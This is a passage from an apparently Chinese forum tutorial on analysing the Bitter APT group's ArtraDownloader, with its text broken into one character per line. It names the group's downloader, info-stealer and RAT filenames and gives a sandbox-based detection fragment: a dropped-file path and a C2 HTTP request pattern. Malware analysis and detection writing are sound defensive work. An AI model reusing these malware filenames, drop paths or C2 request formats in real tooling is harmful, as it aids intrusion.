器
“
I
g
f
x
s
r
v
k
.
e
x
e
”
,
信
息
收
集
器
“
L
s
a
p
.
e
x
e
”
,
远
控
木
马
“
M
S
A
S
e
r
v
i
c
e
s
”
和
“
M
S
A
S
e
r
v
i
c
e
t
”
等
。
虽
然
与
本
次
攻
击
活
动
的
样
本
无
强
关
联
的
关
系
,
一
般
来
说
都
是
这
几
个
搭
配
着
使
用
,
可
以
作
为
日
常
积
累
进
行
分
析
记
录
。
分
析
A
P
T
组
织
常
用
的
T
T
P
s
(
攻
击
手
法
)
,
将
完
整
的
攻
击
链
分
解
为
多
个
阶
段
,
将
多
次
攻
击
活
动
的
样
本
名
称
、
M
D
5
、
功
能
都
记
录
保
存
之
后
,
以
文
件
名
、
P
D
B
信
息
、
C
2
指
令
,
沙
箱
行
为
等
信
息
进
行
组
合
,
写
出
多
角
度
多
层
级
的
检
测
规
则
。
在
理
论
理
想
(
重
音
)
的
信
息
复
利
下
,
可
以
更
好
地
发
现
、
预
警
A
P
T
攻
击
活
动
,
跟
踪
A
P
T
组
织
的
手
法
演
进
。
F
i
l
e
s
D
r
o
p
p
e
d
=
C
:
i
n
t
e
l
l
o
g
s
d
l
h
o
s
t
.
e
x
e
H
T
T
P
R
e
q
u
e
s
t
s
=
h
t
t
p
_
u
r
l
=
a
%
3
d
*
b
%
3
d
*
c
%
3
d
W
i
n
d
o
w
s
*
d
%
3
d
&
h
t
t
p
_
m
e
t
h
o
d
=
G
E
T
结
语
结
语
蔓
灵
花
的
常
用
下
载
器
A
r
t
r
a
D
o
w
n
l
o
a
d
e
r
分
析
到
这
里
就
结
束
啦
~
分
析
透
一
个
经
典
的
样
本
后
,
就
相
当
于
掌
握
了
一
个
类
型
的
病
毒
,
恶
意
功
能
和
实
现
的
代
码
都
是
大
同
小
异
的
。
通
过
大
量
的
分
析
和
积
累
经
验
(
《
机
器
学
习
》
)
,
理
解
原
理
后
就
可
以
更
快
的
找
到
断
点
和
不
同
处
。
再
将
其
特
征
应
用
到
检
测
环
境
中
,
发
现
或
追
踪
A
P
T
组
织
的
攻
击
活
动
,
甚
至
在
大
量
的
历
史
攻
击
手
法
演
变
数
据
下
进
行
未
来
攻
击
的
预
测
(
如
S
t
r
o
n
g
P
i
t
y
(
下
期
再
见
)
)
,
掌
握
先
机
拉
取
更
多
的
恶
意
载
荷
,
为
下
一
次
极
速
响
应
争
取
时
间
。
前
辈
们
精
品
帖
子
很
多
,
我
写
的
比
较
偏
零
基
础
教
学
方
面
,
希
望
有
错
之
处
大
家
能
帮
忙
指
正
和
轻
拍
。
精
彩
推
荐
精
彩
推
荐
阅
读
原
文
回复
举报
上一个主题
下一个主题
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
立即注册
本版积分规则
发表回复
!disable!!post_parseurl!
使用Markdown编辑器编辑
使用富文本编辑器编辑
回帖后跳转到最后一页
发表
IOT